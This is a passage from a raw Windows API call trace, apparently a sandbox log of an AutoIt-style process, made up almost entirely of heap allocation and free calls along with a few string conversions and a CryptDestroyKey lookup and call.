hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0267.759] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0267.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0267.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0267.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.759] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e516b8 [0267.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0267.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51778 [0267.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51838 [0267.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0267.759] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51880 [0267.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0267.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0267.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e515c8 [0267.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ca8 [0267.762] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0267.762] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0267.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ca8 | out: hHeap=0x970000) returned 1 [0267.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fd8 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0267.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a18 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0267.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0267.763] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b50 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0267.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.764] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0267.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0267.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0267.764] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0267.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0267.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0267.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0267.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.764] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0267.764] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0267.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0267.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0267.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0267.765] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0267.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0267.765] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0267.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0267.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0267.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0267.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0267.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e519a0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0267.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0267.766] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0267.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0267.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0267.766] CryptDestroyKey (hKey=0xa87590) returned 1 [0267.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f148d8 [0267.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0267.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0267.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a90 [0267.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0267.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0267.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0267.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0267.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519e8 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0267.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f148d8 | out: hHeap=0x970000) returned 1 [0267.768] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0267.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.768] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0267.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0267.769] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0267.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544b8 | out: hHeap=0x970000) returned 1 [0267.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b08 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0267.769] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0267.769] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0267.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0267.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e518e0 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0267.769] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0267.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0267.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0267.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51970 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0267.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0267.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b50 [0267.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0267.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b80 [0267.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0267.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b38 [0267.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0267.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b50 | out: hHeap=0x970000) returned 1 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0267.770] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0267.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0267.770] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0267.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0267.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55b20 [0267.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0267.770] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55b20 | out: hHeap=0x970000) returned 1 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0267.771] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0267.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0267.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | 